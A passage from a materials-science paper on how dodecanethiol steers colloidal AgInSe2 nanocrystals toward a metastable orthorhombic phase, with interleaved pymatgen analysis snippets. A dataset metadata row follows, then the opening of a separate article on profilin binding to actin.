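# Simulate Cu Ka powder XRD reference patterns for candidate Ag2Se polymorphs.
from pymatgen.core import Structure
from pymatgen.analysis.diffraction.xrd import XRDCalculator

calc = XRDCalculator(wavelength="CuKa")  # matches the lab diffractometer source
for cif in ["Ag2Se_orthorhombic.cif", "Ag2Se_tetragonal.cif", "Ag2Se_cubic.cif"]:
    pattern = calc.get_pattern(Structure.from_file(cif), two_theta_range=(10, 60))
    # Print the first few peak positions/intensities for comparison with aliquots.
    print(cif, list(zip(pattern.x[:5], pattern.y[:5])))
```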
This observation is supported by the fact that on the bulk Ag2Se-In2Se3 pseudo-binary phase diagram of AgInSe2, both cubic and orthorhombic Ag2Se can convert to chalcopyrite AgInSe2 with increasing In3+ content. 41 On the nanoscale, conversion of Ag2Se to AgInSe2 can be thought of as a partial cation exchange in which two equivalents of Ag2Se combine with one equivalent of In3+ to yield AgInSe2 with the expulsion of three Ag+ ions. Neither orthorhombic nor cubic Ag2Se has a cubic close-packed Se2− anion sub-lattice (i.e., cubic Ag2Se is body-centered cubic and orthorhombic Ag2Se is nearly hexagonally close-packed, vide infra), whereas the Se2− sub-lattice of chalcopyrite AgInSe2 is cubic close-packed (see Figure S6). Thus, to generate chalcopyrite AgInSe2 nanocrystals from Ag2Se intermediates, a reconstructive transition via non-topotactic cation exchange must occur in which the Se2− sub-lattice reorganizes to a cubic close-packed structure.
Figure 2. (a) Aliquot study to elucidate the formation pathway of chalcopyrite AgInSe2 nanocrystals by powder XRD. A mixture of binary Ag2Se phases is obtained at early times. This mixture progresses towards chalcopyrite AgInSe2 as a function of increasing time, but binary intermediates are still present even after 15 min. (b) An aliquot study to follow the formation of the metastable orthorhombic phase of AgInSe2 by powder XRD reveals that this ternary phase forms very quickly when DDT is present in large excess (20 equivalents). (c) Powder XRD aliquot study when nucleating nanocrystals in the presence of 5 equivalents of DDT. XRD shows that under these conditions, the intermediate that forms is predominantly orthorhombic Ag2Se, which is distinct from the mixture of phases observed at early times in the absence of DDT.
While this reorganization to the chalcopyrite structure is thermodynamically favored, it is necessarily kinetically slow. For that reason, the hot-injection syntheses without DDT always resulted in products comprised of chalcopyrite AgInSe2 with some binary Ag2Se impurities, even when reactions were carried out in the presence of excess In(OAc)3 and for extended periods of time (Figure S7). To improve the phase purity of the chalcopyrite AgInSe2 products, a heating-up procedure can be employed, whereby all reagents are combined in a flask with oleic acid and ODE and heated to the desired reaction temperature. This method proved more effective in converting the Ag2Se intermediates to a product containing almost exclusively chalcopyrite AgInSe2 (Figure S7).
Figure 3 (partial caption). (c) ... If this site were occupied with a cation, the resulting tetrahedron would be corner-sharing with neighboring tetrahedra along the edges highlighted in yellow. (d) Full structure of orthorhombic Ag2Se, with the trigonally coordinated Ag+ sites shown in blue and tetrahedral sites shown in gray. (e) Depiction of orthorhombic Ag2Se when all trigonal sites are removed from the structure; the periodic tetrahedral holes within the structure are illustrated by dashed red lines. This corner-sharing structure is nearly identical to that of orthorhombic AgInSe2. (f) Full structure of orthorhombic AgInSe2 (green atoms = Se, gray atoms/tetrahedra = silver, pink atoms/tetrahedra = indium).
Formation of Orthorhombic AgInSe2 and the Role of DDT.
The formation of orthorhombic AgInSe2 nanocrystals in the presence of DDT suggests that DDT changes the mechanism of formation of the ternary material. To better understand this mechanism, we performed additional aliquot studies with hot injection of Bn2Se2 as the selenium precursor. In contrast to the long-lived binary Ag2Se intermediates observed in the aliquot study with no DDT (Figure 2a), the analogous aliquot study in the presence of DDT reveals fast conversion of precursors to the metastable orthorhombic AgInSe2 product (Figure 2b). The amount of DDT was reduced from the 20 equivalents (relative to the metal precursors) used in the original synthesis to 5 equivalents in order to better observe any binary Ag2Se intermediates (Figure 2c). Above this threshold value, conversion happened so quickly that no binary intermediates were observed preceding the formation of orthorhombic AgInSe2. Notably, Figure 2c illustrates that when DDT is present, the predominant intermediate observed is the orthorhombic phase of Ag2Se, and not the complex mixture of silver selenides observed in the absence of DDT, indicating that orthorhombic Ag2Se is the intermediate that leads to orthorhombic AgInSe2. This fast conversion of orthorhombic Ag2Se elucidates the role of DDT in the reaction: as a soft base, it is capable of mediating cation exchange from the orthorhombic Ag2Se phase, which is otherwise kinetically sluggish to react with In3+ cations due to the low intrinsic ionic conductivity of orthorhombic Ag2Se (~10−4 S/cm). 44 While others [38][39][40] have observed the presence of orthorhombic Ag2Se prior to the formation of orthorhombic AgInSe2, this transformation is not well understood in the literature. Abazović et al. speculated that the formation of the metastable phase of AgInSe2 is in some way related to how ligands bind to the surfaces of the ternary nanocrystal nuclei, thus directing the phase towards orthorhombic AgInSe2. 38 We propose a more nuanced mechanism of formation for orthorhombic AgInSe2 whereby a DDT-mediated topotactic cation exchange converts orthorhombic Ag2Se to orthorhombic AgInSe2.
Structural comparisons of orthorhombic Ag2Se to orthorhombic AgInSe2 reveal similarities between these two crystal structures and elucidate how the process of cation exchange transforms the former into the latter. Upon examining the Se2− sub-lattice of orthorhombic Ag2Se, it is apparent that there exists a nearly hexagonally close-packed network of Se2− anions in the [010] direction (Figure 3a). These hexagonal sheets of Se2− are nearly planar, although the in-plane Se-Se angles are distorted from the 120° in-plane angles within the hexagonal lattice of orthorhombic AgInSe2 (Figure 3a, b). The interplanar d-spacing between Se2− sheets along the [010] direction in orthorhombic Ag2Se is 3.56 Å, whereas the d-spacing along the [001] direction of close packing in AgInSe2 is slightly less, at 3.51 Å. Moreover, the average Se-Se distance within a hexagonal sheet of Se is 4.53 Å for orthorhombic Ag2Se and 4.24 Å for orthorhombic AgInSe2. Topotactic cation exchange from orthorhombic Ag2Se to orthorhombic AgInSe2 should naturally allow for this slight lattice contraction, considering that the ionic radius of four-coordinate Ag+ (129 pm) is larger than that of four-coordinate In3+ (94 pm). Overall, the Se2− sub-lattice of orthorhombic Ag2Se resembles that of AgInSe2, since only slight changes are needed to take the former to the latter.
Considering that the Se2− sub-lattices are so similar, the redistribution of cations upon cation exchange with In3+ comprises the more significant structural transformation in going from orthorhombic Ag2Se to orthorhombic AgInSe2. The asymmetric unit of orthorhombic Ag2Se has one crystallographically unique Se2− site and two unique Ag+ sites. 43,45 Of the two Ag+ sites, one resides within a tetrahedral hole. These tetrahedra share edges with two adjacent, symmetrically equivalent tetrahedra along the [100] direction. The other Ag+ site exists in a trigonal planar coordination geometry (Figure 3d). The orthorhombic structure of AgInSe2 is wurtzite-like in that the Se2− sub-lattice is hexagonally close-packed and all cations reside in corner-sharing tetrahedral coordination environments. Thus, to form this structure from orthorhombic Ag2Se, cation exchange needs to occur in a manner that disrupts the edge-sharing and trigonal planar coordination geometries to yield the requisite corner-sharing tetrahedron motif. To achieve such a transformation, the periodic tetrahedral holes that exist within the structure of orthorhombic Ag2Se (Figure 3c, e) need to be filled either by incoming In3+ ions or by neighboring Ag+ ions that, upon migrating, would leave behind corner-sharing tetrahedral holes that In3+ could fill. Figure 3e demonstrates how removing the edge-sharing tetrahedra and trigonal planar coordination environments from the orthorhombic Ag2Se structure, and placing cations within the periodic tetrahedral holes, leads to the wurtzite-like structure of orthorhombic AgInSe2. Occupation of the tetrahedral holes in orthorhombic Ag2Se would lead to unstable, edge-sharing configurations with both the proximal Ag+ tetrahedra and the trigonal planar sites (Figure 3c). Every In3+ ion incorporated into the structure must expel three Ag+ ions to maintain charge neutrality. Therefore, it is useful to visualize a transformation wherein each In3+ ion displaces one Ag+ ion from a neighboring tetrahedral coordination site and two Ag+ ions from trigonal planar coordination sites, creating more stable corner-sharing configurations via the displacement of edge-sharing motifs within the structure. While the mechanism described above illustrates how the corner-sharing network of tetrahedra in orthorhombic AgInSe2 can be derived from orthorhombic Ag2Se, it does not explicitly explain how or why the specific ordering of cations in orthorhombic AgInSe2 arises through this transformation. In fact, the tetrahedral holes within orthorhombic Ag2Se are periodic such that along the [100] direction they form a linear channel of vacancies (Figure 4a). If all In3+ cations were to occupy these vacancies, the resulting ternary structure would contain linear chains of Ag+ and In3+ in the [010] direction, where the cations within each chain would be identical (Figure 4d). However, this arrangement of cations is not present within the orthorhombic structure of AgInSe2; rather, the cationic sites along the [010] direction alternate between Ag+ and In3+ (Figure 4b). This indicates that an ion hopping process is operative during cation exchange, such that Ag+ ions migrate to accommodate incoming In3+.
By comparing the calculated electrostatic site potentials and Madelung energy of the orthorhombic AgInSe2 structure to those of the structure that would result from simply filling the periodic holes within orthorhombic Ag2Se, we found that there is an electrostatic driving force for this shuffling of Ag+ during cation exchange. In the theoretical ternary structure derived directly from orthorhombic Ag2Se with no ion hopping, the calculated In3+ site potential (−1.54 e/Å) is greater than that for the In3+ site in orthorhombic AgInSe2 (−1.67 e/Å), an indication that electrostatic repulsion between neighboring In3+ ions is more significant in the theoretical arrangement than in the orthorhombic structure of AgInSe2. This finding is also supported by the Madelung energy calculations, the Madelung energy representing the attractive electrostatic component of the lattice energy of an ionic solid. 46 The Madelung energy of the theoretical ternary structure (−7.38 MJ/mol) is higher than that of the experimentally observed orthorhombic AgInSe2 structure (−7.60 MJ/mol; see the SI for calculation details).
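The site-potential and Madelung comparison above was done in VESTA (see the SI); for readers who prefer a scriptable route, an Ewald summation over oxidation-state-decorated structures gives the same kind of electrostatic ranking. The sketch below uses pymatgen's EwaldSummation as a stand-in (an assumption; absolute numbers will differ from VESTA's direct-sum settings, but the ordering of the two candidate structures is the quantity of interest), with placeholder CIF names.

```python
# Rank the two cation arrangements by electrostatic (Ewald) lattice energy.
from pymatgen.core import Structure
from pymatgen.analysis.ewald import EwaldSummation

for cif in ["AgInSe2_orthorhombic.cif", "AgInSe2_vacancy_filled_P1.cif"]:
    s = Structure.from_file(cif)
    s.add_oxidation_state_by_element({"Ag": 1, "In": 3, "Se": -2})
    print(cif, f"{EwaldSummation(s).total_energy:.2f} eV per cell")
```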
The Materials Project database contains thermodynamic information calculated for six polymorphs of AgInSe2, two of which are experimentally known (the tetragonal chalcopyrite phase, space group I-42d, and a trigonal phase), and four of which are theoretical structures (R3m, I41/amd, Fdd2, P4/mmm) calculated by DFT. Of these, the tetragonal I-42d polymorph is predicted to be stable, with the trigonal polymorph exhibiting a degree of metastability at 0.1 eV/atom above the 0 K convex hull (Figure S8). Typically, materials with a predicted metastability in the range of ~0.1 eV/atom are considered in principle synthesizable under appropriate conditions, although this is highly dependent on chemical composition. 47 To supplement these calculations, an additional calculation was performed on the orthorhombic Pna21 polymorph of AgInSe2. The Pna21 polymorph was found to have a formation energy of −0.412 eV/atom, which is 10 meV/atom above the predicted stable chalcopyrite phase of AgInSe2. Figure S8 combines this result with existing Materials Project data using the phase diagram analysis capability of the pymatgen package. 48 This low-lying metastability is not unprecedented; in fact, many metastable metal selenide materials lie less than 25 meV/atom above the thermodynamic ground state, and the median energy above the ground state for metastable ternary polymorphs, irrespective of composition, is 6.9 meV/atom. 5 Thus, while the orthorhombic structure is metastable, it is higher in energy than the chalcopyrite structure by only a small margin, which may explain why it is isolable.
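To make the hull construction concrete, the toy sketch below reproduces the quoted 10 meV/atom separation with pymatgen's PhaseDiagram, working directly in formation energies with the elements pinned at zero. The binary formation energies are placeholders chosen only so that chalcopyrite AgInSe2 sits on the hull; the chalcopyrite value (−0.422 eV/atom) is inferred from the Pna21 result (−0.412 eV/atom) lying 10 meV/atom above it, and a real analysis would use compatible DFT total energies as described in the text.

```python
from pymatgen.core import Composition
from pymatgen.analysis.phase_diagram import PhaseDiagram, PDEntry

def entry(formula, e_form_per_atom):
    comp = Composition(formula)
    return PDEntry(comp, e_form_per_atom * comp.num_atoms)  # energy of one formula unit

entries = [entry("Ag", 0.0), entry("In", 0.0), entry("Se", 0.0),
           entry("Ag2Se", -0.25),     # placeholder
           entry("In2Se3", -0.40),    # placeholder
           entry("AgInSe2", -0.422),  # chalcopyrite, inferred as noted above
           entry("AgInSe2", -0.412)]  # Pna21 value from this work
pd = PhaseDiagram(entries)
print(f"{pd.get_e_above_hull(entries[-1]) * 1000:.0f} meV/atom")  # -> 10 meV/atom
```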
Predicting the Syntheses of Novel Metastable Polymorphs on the Nanoscale.
Predictable syntheses of metastable materials at large remain a challenge. From this work, and our previous work on phase control of CuInSe2 nanocrystals, 24 we note an interesting pattern emerging. In both cases, the metastable ternary chalcogenide nanocrystals form via cation exchange from low-temperature structures of binary selenides, which are metastable at the relatively high temperatures of their respective nanocrystal syntheses.
Figure 5 (partial caption). The highlighted areas indicate the type of Se2− sub-lattice present for each respective phase (blue = pseudo-hcp, red = bcc, white = fcc). Notably, there exist lattice mismatches in going from either phase of Ag2Se to chalcopyrite AgInSe2. Such lattice mismatches can be taken advantage of by leveraging fast cation exchange kinetics on the nanoscale to generate novel metastable ternary structures. (b) Reaction scheme explaining the isolation of metastable AgInSe2; the orthorhombic phase of AgInSe2 is only 10 meV/atom higher in energy than the chalcopyrite phase and has a Se2− sub-lattice analogous to that of orthorhombic Ag2Se, allowing for fast, DDT-mediated conversion to the ternary metastable phase.
Notably, for both copper and silver selenides, the low-temperature (Cu3Se2 and orthorhombic Ag2Se) and high-temperature (Cu2-xSe and cubic Ag2Se) phases differ significantly in their Se2− sub-lattices, with the low-temperature phase of each being pseudo-hexagonal and the high-temperature phases assuming face-centered and body-centered cubic Se2− sub-lattices, respectively. As mentioned above, the chalcopyrite structure type possesses a face-centered cubic Se2− sub-lattice. Therefore, isolating metastable ternaries in these cases relies on the conversion of binary selenides that possess Se2− sub-lattices that do not form in bulk for the ternary materials. In the formation of both metastable polymorphs of AgInSe2 and CuInSe2, kinetically fast topotactic cation exchange mechanisms provide the means of preserving the distinct hexagonal Se2− sub-lattices upon reaction with In3+. These mechanisms outcompete processes that would otherwise lead to the thermodynamically preferred crystal structures, and instead lead to metastable ternary structures that do not exist on the respective bulk phase diagrams of the ternary selenides.
More generally, a promising area to explore in the rational discovery of new metastable nanomaterials may be material systems that exhibit mismatches between the binary and ternary anionic sub-lattices: binary polymorphs with distinct anionic sub-lattices could generate new metastable ternary structures by reacting with a third element in a way that preserves the anionic sub-lattice. In effect, mismatches between anionic sub-lattices can act as effective kinetic barriers that restrict quick access to the thermodynamic structures, allowing for the isolation of metastable polymorphs on the nanoscale, as exemplified by Figure 5. Inspecting pseudo-binary phase diagrams of ternary material systems, and the phase diagrams of the binaries that could lead to ternary materials, is insightful and can act as a guide when searching for lattice mismatches to exploit in new metastable nanomaterial syntheses.
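One way to operationalize this search is to strip the cations from candidate binary intermediates and target ternaries and test whether the remaining anion frameworks match; a mismatch flags a system where fast cation exchange might trap a metastable ternary polymorph. The sketch below does this with pymatgen's StructureMatcher; the approach and the CIF file names are illustrative assumptions, not a validated screening protocol.

```python
# Flag anion sub-lattice mismatch between a binary intermediate and a ternary target.
from pymatgen.core import Structure
from pymatgen.analysis.structure_matcher import StructureMatcher

def anion_sublattice(cif, anion="Se"):
    s = Structure.from_file(cif)
    s.remove_species([el for el in map(str, s.composition.elements) if el != anion])
    return s

matcher = StructureMatcher(primitive_cell=True, attempt_supercell=True)
binary = anion_sublattice("Ag2Se_orthorhombic.cif")
ternary = anion_sublattice("AgInSe2_chalcopyrite.cif")
print("anion sub-lattices match:", matcher.fit(binary, ternary))  # False -> mismatch
```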
To check that this conceptual framework holds true for more than just CuInSe2 and AgInSe2, we inspected the pseudo-binary phase diagram of the Cu2Se-SnSe2 system; here, with increasing Sn 4+ content, cubic Cu2Se (66.7 % Cu, 33.3 % Se, stable above ~130 °C) converts to a cubic, sphalerite phase of Cu2SnSe3. 49 However, the low-temperature Cu3Se2 phase (60 % Cu, 40 % Se) has a pseudo-hexagonal anionic sub-lattice 24 and it maintains a Cu:Se ratio within the boundaries of the two-phase Cu2Se-SnSe2 region. Therefore, we expect a kinetically fast reaction of Cu3Se2 with Sn 4+ to produce a metastable, hexagonal phase of Cu2SnSe3 since there exists a sub-lattice mismatch in going from Cu3Se2 to the thermodynamically preferred sphalerite phase of Cu2SnSe3. Indeed, such a metastable hexagonal phase exists that was previously unknown in bulk, as we first reported the isolation of wurtzite-like Cu2SnSe3 nanocrystals in 2012. 50 This further illustrates the utility of leveraging sub-lattice mismatches to generate novel metastable materials.
We hypothesize that this conceptual framework can also be extended to the predictable isolation of metastable phases not present on bulk phase diagrams for quaternary materials. To support this hypothesis, we turned to the Cu2ZnSnS4 literature. Cu2ZnSnS4 is a quaternary material that possesses a face-centered cubic anionic sub-lattice and crystallizes in the kesterite structure type, 51,52 analogous to the diamondoid chalcopyrite structure type for ternary materials. The quasi-ternary Cu2S-ZnS-SnS2 phase diagram shows that, in bulk, the introduction of ZnS and SnS2 into Cu2S results in the conversion of a Cu2S polymorph (digenite, a high-temperature phase stable up to 1130 °C) with a face-centered cubic anionic sub-lattice to kesterite Cu2ZnSnS4. 53,54 However, wurtzite-like Cu2ZnSnS4 nanocrystals have been synthesized, 55,56 despite the fact that this phase does not exist in bulk. Phenomenologically, this wurtzite-like phase must be the result of kinetically fast reactions involving a low-temperature phase of Cu2-xS (such as djurleite or roxbyite) 23,54 that does not possess an fcc anionic sub-lattice. Thus, the utility of this conceptual framework is demonstrated by its ability to explain empirically discovered metastable ternary and quaternary nanomaterials. In summary, coupling the identification of material systems that exhibit lattice mismatches between potential kinetic intermediates and the thermodynamically expected products with computations that reveal the energetics of the predicted metastable phases could provide a useful new methodology for the rational discovery of metastable nanomaterials that have never been observed on bulk phase diagrams.
CONCLUSIONS
In conclusion, this work sheds light on the mechanism of phase determination in AgInSe2 nanocrystals. More specifically, DDT mediates a fast cation exchange from orthorhombic Ag2Se to form the metastable orthorhombic phase of AgInSe2. Without DDT as an exchange mediator, this orthorhombic Ag2Se intermediate cannot readily undergo cation exchange, owing to its low intrinsic ionic conductivity. In reactions that occur in the absence of DDT, various silver selenide intermediates form and then convert to the thermodynamic chalcopyrite structure of AgInSe2 via kinetically slow, non-topotactic cation exchange processes. In addition to elucidating the mechanism of formation of the metastable orthorhombic phase of AgInSe2, we found that its isolation likely also correlates with the fact that it is only marginally metastable, at 10 meV/atom above the ground state. Finally, we provide a new conceptual framework to predict metastable polymorphs that do not form in bulk; using phase diagrams, it is possible to identify sub-lattice mismatches between kinetic intermediates that form quickly in nanocrystal syntheses and the thermodynamically most stable polymorphs of multinary materials. Fast conversion of intermediates with distinct sub-lattices can generate new metastable structures of multinary nanomaterials not present on bulk phase diagrams. In predicting these new phases, convex hull calculations can provide an idea of whether such metastable materials should be isolable from a thermodynamic perspective.
EXPERIMENTAL SECTION
Materials and General Procedures. Silver(I) nitrate (AgNO3, Alfa Aesar, 99.9%), indium(III) acetate (In(OAc)3, Alfa Aesar, 99.99%), dibenzyl diselenide (Bn2Se2, Alfa Aesar, 95%), 1-dodecanethiol (DDT, Alfa Aesar, 98%), 1-octadecene (ODE, Sigma-Aldrich, 90%), oleic acid (Alfa Aesar, 90%), and selenium powder, ~200 mesh (Alfa Aesar, 99.999%), were all used as received, with no further purification. All solvents were degassed prior to use for 4 h at 105 °C and then overnight at room temperature. Reactions were conducted under a nitrogen atmosphere using standard Schlenk techniques. All reactions employed J-KEM temperature controllers with in-situ thermocouples to control and monitor the temperature of the reaction vessel.
Synthesis of AgInSe2 Nanocrystals. We adapted the general synthesis of AgInSe2 nanocrystals from Deng et al., 28 but here using a diselenide precursor. In a typical synthesis, AgNO3 (16.9 mg, 0.1 mmol) and In(OAc)3 (29.1 mg, 0.1 mmol) were loaded into a 25 mL three-neck round-bottom flask. Bn2Se2 (34.0 mg, 0.1 mmol) was added to a separate two-neck round-bottom flask. In the syntheses of orthorhombic AgInSe2 nanocrystals, 4 mL of ODE, 0.5 mL of DDT, and 50 µL of oleic acid were added to the three-neck flask, and 0.5 mL of ODE and 0.5 mL of DDT were added to the two-neck flask. In the syntheses of chalcopyrite AgInSe2 nanocrystals, all DDT was replaced with an equal volume of oleic acid, keeping the volumes of ODE constant. After adding the solvents, the flasks were degassed at 100 °C for 1 h. The metal precursor-containing flask was then ramped to 250 °C at 10 °C/min under nitrogen. Upon reaching the injection temperature (200 °C for DDT-containing reactions and 230 °C for reactions not containing DDT), the Bn2Se2 solution was injected into the metal precursor-containing flask, resulting in nucleation of nanocrystals (the relatively low 200 °C injection temperature for DDT-containing reactions was implemented to prevent formation of sulfides prior to injection of the diselenide). Following injection, the three-neck flask recovered to 250 °C and the reaction was allowed to proceed for a total of 30 min after injection. The three-neck flask was then quenched by placing it in a room-temperature water bath. The crude product was split into two 40 mL centrifuge tubes, which were filled to volume with ethanol. The centrifuge tubes were bath sonicated for 10 min and centrifuged for 3 min. The product was redispersed in 5 mL of hexanes in each centrifuge tube and filled to volume with ethanol. This washing procedure was repeated two more times to yield particles for XRD analysis.
Aliquot Studies. All aliquot studies were performed using the same experimental protocols described for the synthesis of AgInSe2 nanocrystals; however, to capture the various intermediates that precede AgInSe2 formation, the final reaction temperatures (and the amount of DDT in the case of orthorhombic AgInSe2) were reduced from the 250 °C used in the initial syntheses to 230 °C. In the case of orthorhombic AgInSe2, this reduction in temperature was still not enough to capture the timescale of formation of the ternary phase. To observe the binary orthorhombic Ag2Se intermediate, the amount of DDT for the aliquot study was reduced from 20 equivalents with respect to the metal precursors to 5 equivalents. Under these conditions, we were able to observe the binary intermediate.
Characterization. Powder X-ray diffraction (XRD) measurements were performed on a Rigaku Ultima IV powder X-ray diffractometer using Cu Kα radiation (λ = 1.5406 Å).
Samples were analyzed on a zero-diffraction silicon substrate. Transmission electron microscopy (TEM) micrographs were obtained from drop-cast samples supported on holey carbon-coated copper TEM grids (Ted Pella, Inc.). Grids were placed in a vacuum oven overnight at 60 °C to remove volatile organics. A JEOL JEM-2100 microscope with a Gatan Orius charge-coupled device (CCD) camera was used to take TEM images at an operating voltage of 200 kV. Thermogravimetric analysis (TGA) was performed on a TGA Q50 instrument with a heating rate of 10 °C/min and an approximate sample size of 10 mg in an alumina crucible.
Density Functional Theory (DFT). Formation energy calculations were performed on the orthorhombic Pna21 polymorph using the Vienna Ab initio Simulation Package (VASP), projector augmented-wave (PAW) pseudopotentials, and a k-point density of 64 points per Å−3, consistent with Materials Project standard settings to ensure that the energies would be directly comparable to existing Materials Project calculations. 57,58 The atomic positions and crystal lattice were allowed to relax, resulting in lattice parameters of a = 7.48 Å, b = 8.76 Å, and c = 7.14 Å. These calculations were performed using the PBE exchange-correlation functional, and so the lattice parameters are expected to be slightly overestimated compared to experiment.
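For reproducibility, inputs consistent with Materials Project standard settings can be generated with pymatgen's MPRelaxSet; this is a sketch of that route (the CIF name is a placeholder, and a configured POTCAR library is assumed), not necessarily the exact tooling used here.

```python
# Generate MP-compatible VASP inputs (PBE, PAW, MP k-point density) for Pna21 AgInSe2.
from pymatgen.core import Structure
from pymatgen.io.vasp.sets import MPRelaxSet

structure = Structure.from_file("AgInSe2_Pna21.cif")
MPRelaxSet(structure).write_input("AgInSe2_Pna21_relax")  # writes INCAR, KPOINTS, POSCAR, POTCAR
```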
Supporting Information
The Supporting Information is available free of charge on the ACS Publications website.
Additional figures including simulated and experimental XRD patterns; TGA traces; control aliquot studies; Se2− sub-lattice illustrations; Rietveld refinements and parameters; Madelung constant and site potential calculation details (PDF).
Figure S1 (partial caption). Note that the Pna21 structure can be distinguished by unique reflections at 15-16° 2θ from the (110) and (011) lattice plane families, which are absent in the higher-symmetry wurtzite structure type. The inset illustrates an experimental powder XRD pattern of the as-synthesized orthorhombic AgInSe2 nanocrystals; the minor reflections at 15-16° 2θ are observed, confirming that these nanocrystals crystallize in the Pna21 space group.
Figure S2. (a) Annealing powders of the as-prepared orthorhombic AgInSe2 nanocrystals to 300 °C does not cause the material to thermally relax to the thermodynamically preferred chalcopyrite structure by XRD, even after several heating-cooling cycles, indicating that there is a barrier to a phase transition to the chalcopyrite phase. Note, however, that at these temperatures some of the Ag+ is reduced to Ag. Powder XRD of the material taken from the TGA crucible after heating to 450 °C shows that the reduction of Ag+ to Ag is more pronounced at higher temperatures, but that the orthorhombic phase still persists. Notably, this progression of XRD patterns was taken from a material that had been left on the lab bench for 10 months. (b) Heating as-synthesized orthorhombic AgInSe2 nanocrystals in 1-octadecene at 300 °C for 1 h shows that the orthorhombic phase is still predominant, although XRD indicates some conversion of orthorhombic to chalcopyrite AgInSe2.
Figure S3. (a) TGA trace of orthorhombic AgInSe2 up to 300 °C; the material shows minimal mass loss at this temperature. (b) TGA trace of orthorhombic AgInSe2 up to 450 °C; here, a much larger mass loss is evident, as the surface ligands are stripped from the nanocrystal surface at this temperature. It is possible that ligand loss from the nanocrystal surface correlates with the observed reduction of Ag+ to Ag shown in Figure S2.
Figure S4. (a) Powder XRD pattern of the orthorhombic AgInSe2 that forms when only DDT and ODE are included in the reaction, indicating that oleic acid is not important in the isolation of the metastable phase. (b) When DDT is replaced by an equal amount of oleic acid in the solvent mixture, chalcopyrite AgInSe2 forms with some Ag2Se impurities by powder XRD, indicating that DDT is important in phase determination.
Figure S5. Powder XRD aliquot studies of a reaction in which Bn2Se2 was hot-injected into a flask containing a solution of only AgNO3 (with no In(OAc)3 present). A complex mixture of Ag2Se polymorphs results. Although cubic Ag2Se is the thermodynamically stable polymorph at the reaction temperatures, no significant phase transitions were observed over the time scale of the reaction, indicating that the other Ag2Se phases present are kinetically resistant to a phase transition to cubic Ag2Se under these conditions.
Figure S6. (a) Se2− sub-lattice of chalcopyrite AgInSe2; note that the lattice is fcc, as it contains an ABC packing motif. (b) Se2− sub-lattice of cubic Ag2Se; this lattice is body-centered cubic.
Figure S7. Hot-injection reactions (highlighted with yellow background) that were allowed to react for longer times in the presence of excess In3+ (the initial reactions were performed with 1:1 In:Ag ratios) did not produce phase-pure AgInSe2 by powder XRD.
Heating-up reactions (highlighted with blue background) showed better conversion to chalcopyrite AgInSe2 in the presence of excess In 3+ , with the 3 h reaction producing nearly phase-pure chalcopyrite AgInSe2 as shown by a Rietveld refinement of powder XRD data in (b). All heating-up reactions were performed at 250 °C. Figure S8. (a) The 0 K phase diagram of the Ag-In-Se chemical system, color coded by calculated formation energy. (b) The relative ordering of AgInSe2 polymorphs, as predicted by calculation.
Electrostatic site potential and Madelung energy calculations:
The orthorhombic AgInSe2 CIF served as a template to create the CIF of the theoretical structure that would result if the vacancies in the orthorhombic Ag2Se structure were directly filled by In3+ (we derived the CIF of orthorhombic AgInSe2 itself from a CIF of the isostructural AgInS2, corrected for lattice parameters, unit cell volume, and composition; the collection code for the AgInS2 CIF in the ICSD is 51618). Because the space group of this theoretical structure was not known, the space group was defined as P1 in the CIF and the Cartesian coordinates of each atom in the structure were explicitly defined.
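A scriptable alternative to hand-editing the CIF is to write the edited structure back out with all sites explicit and symmetry reduced to P1, which is the form the Madelung calculation below requires. The sketch uses pymatgen's CifWriter; the file names and the site-editing step are placeholders.

```python
# Write a P1 CIF (no symmetry operators; every atom listed explicitly).
from pymatgen.core import Structure
from pymatgen.io.cif import CifWriter

s = Structure.from_file("AgInSe2_orthorhombic_template.cif")  # placeholder template
# ... place In on the former vacancy sites of the Ag2Se framework here ...
CifWriter(s, symprec=None).write_file("AgInSe2_theoretical_P1.cif")  # symprec=None -> P1
```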
The VESTA software allows users to calculate electrostatic site potentials and Madelung energies based on user inputs. 1 For all calculations, the user inputs were radius = 1 Å and region = 4 Å−1. The output of the Madelung energy calculation is given in terms of energy per mole of asymmetric units; because the CIF of the theoretical structure explicitly defined the coordinates of each atom without the use of symmetry operators, the asymmetric unit was the entire unit cell. The unit cell is formally Ag4In4Se8, so to obtain the Madelung energy per mole of AgInSe2, the final output was divided by four. | 2019-12-16T22:53:22.818Z | 2019-12-13T00:00:00.000 | {
"year": 2020,
"sha1": "770d09659a4eb1ea3a9b261442236703b41d1666",
"oa_license": "CCBYNC",
"oa_url": "https://figshare.com/articles/journal_contribution/Ligand-Mediated_Phase_Control_in_Colloidal_AgInSe_sub_2_sub_Nanocrystals/12059256/1/files/22166589.pdf",
"oa_status": "GREEN",
"pdf_src": "Adhoc",
"pdf_hash": "b0795efd63c7b883122d824a544e32f6839b236b",
"s2fieldsofstudy": [
"Materials Science",
"Chemistry"
],
"extfieldsofstudy": [
"Materials Science"
]
} |
6685230 | pes2o/s2orc | v3-fos-license | Control of the Ability of Profilin to Bind and Facilitate Nucleotide Exchange from G-actin*
A major factor in profilin regulation of actin cytoskeletal dynamics is its facilitation of G-actin nucleotide exchange. However, the mechanism of this facilitation is unknown. We studied the interaction of yeast (YPF) and human profilin 1 (HPF1) with yeast and mammalian skeletal muscle actins. Homologous pairs (YPF and yeast actin, HPF1 and muscle actin) bound more tightly to one another than heterologous pairs. However, with saturating profilin, HPF1 caused a faster etheno-ATP exchange with both yeast and muscle actins than did YPF. Based on the -fold change in ATP exchange rate/Kd, however, the homologous pairs are more efficient than the heterologous pairs. Thus, strength of binding of profilin to actin and nucleotide exchange rate are not tightly coupled. Actin/HPF interactions were entropically driven, whereas YPF interactions were enthalpically driven. Hybrid yeast actins containing subdomain 1 (sub1) or subdomains 1 and 2 (sub12) muscle actin residues bound more weakly to YPF than did yeast actin (Kd = 2 μM versus 0.6 μM). These hybrids bound even more weakly to HPF than did yeast actin (Kd = 5 μM versus 3.2 μM). sub1/YPF interactions were entropically driven, whereas the sub12/YPF binding was enthalpically driven. Compared with WT yeast actin, YPF binding to sub1 occurred with a 5 times faster koff and a 2 times faster kon. sub12 bound with a 3 times faster koff and a 1.5 times slower kon. Profilin controls the energetics of its interaction with nonhybrid actin, but interactions between actin subdomains 1 and 2 affect the topography of the profilin binding site.
The interaction of actin with the small protein profilin is central to the regulation of actin filament dynamics within the cell. Profilin was first identified as a protein that bound to G-actin and, through sequestration of actin monomers, inhibited filament formation (1,2). The majority of subsequent work demonstrated that profilin exhibited a preference for ATP versus ADP actin and catalyzed the exchange of actin-bound adenine nucleotide (3-5). However, a few studies have disputed this nucleotide preference (6,7). Later work showed that profilin could also work with the actin filament nucleator, formin, to promote filament elongation by delivering actin monomers to the growing end of the formin-capped filament (8-10).
